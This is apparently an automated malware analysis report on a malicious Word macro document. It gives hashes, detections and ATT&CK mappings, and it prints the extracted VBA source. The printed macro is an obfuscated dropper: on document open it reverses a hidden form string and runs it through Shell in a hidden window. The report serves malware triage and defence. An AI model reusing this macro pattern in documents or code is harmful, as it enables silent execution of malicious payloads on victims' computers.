Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 475f625b76c6fd23…

MALICIOUS

Office (OOXML)

88.3 KB Created: 2019-04-10 10:19:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2020-08-10
MD5: 38db088af8cd7d74dba42f80713fe705 SHA-1: 735b95c308ddc83d079b6becdcb2388cd924a2bc SHA-256: 475f625b76c6fd2343a4d82fab6439e9aa6709452e57dd765a6b0c997d03f0ef
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is an OOXML document containing a VBA project with a Document_Open macro. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Dropper.Agent-6976745-0' further suggests its role as a dropper for other malicious content. The VBA code appears obfuscated, but the presence of the Shell() call is a strong indicator of a downloader or executioner.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6976745-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6976745-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1759 bytes
SHA-256: 44276ecc8ec6ac002662d70bd74160655f98f4e85991d7b40cf6b984a97e1775
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim Plq8RoV7j, ITn8lLO
Plq8RoV7j = Date
ITn8lLO = Day(Plq8RoV7j)

Dim jw7UyW
jw7UyW = 4 * Atn(1)
Dim USgqB8sV5
USgqB8sV5 = Abs(27)
Dim jewZI1j
jewZI1j = Fix(-85)
k
End Sub

Attribute VB_Name = "PyEurSK"
Public Function vUGNEZ(KrdR9JUp) As String
Dim ExGHD
ExGHD = 4 * Atn(1)
Dim zBaSd4eW
zBaSd4eW = 4 * Atn(1)
Shell KrdR9JUp, 0
End Function

Attribute VB_Name = "qyKuaF"
Function iqYra6P3v()
Dim RksGDvyg
RksGDvyg = 4 * Atn(1)
Dim fkpRqF
fkpRqF = 4 * Atn(1)
End Function

Attribute VB_Name = "qHxMiNt"
Public Sub k()
Dim L3Ra4
L3Ra4 = 4 * Atn(1)
Dim tXy16tIpP
tXy16tIpP = 4 * Atn(1)
Dim OQnERoyIJ
OQnERoyIJ = Fix(-74)
Dim RPCfq3oZj
RPCfq3oZj = Date
Dim jRegV7, ia4xGTlZ
jRegV7 = Date
ia4xGTlZ = Day(jRegV7)
Dim XFIRgP7
XFIRgP7 = DateSerial(2000, 6, 21)
Set SQOw1P = New btc
Dim O2kDb, RjIakfos6
O2kDb = Date
RjIakfos6 = Day(O2kDb)
vUGNEZ Replace(StrReverse(SQOw1P.win.Text), "LL11", "")
Dim BfHZCs8m
BfHZCs8m = Fix(16)
Dim ffOSeKD, uAQtaWm
ffOSeKD = Date
uAQtaWm = Day(ffOSeKD)
End Sub

Attribute VB_Name = "btc"
Attribute VB_Base = "0{B66B825B-F024-4413-947B-CE5AE3670068}{F303D6E7-E79C-42F9-AC2D-3D61C70ACF4B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub xxx_Change()

End Sub

Private Sub win_Change()

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 25600 bytes
SHA-256: 38ee730aae4401c1a9866c4d895a4d854660f91dd6548a8eecba43ab9ff2efa5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).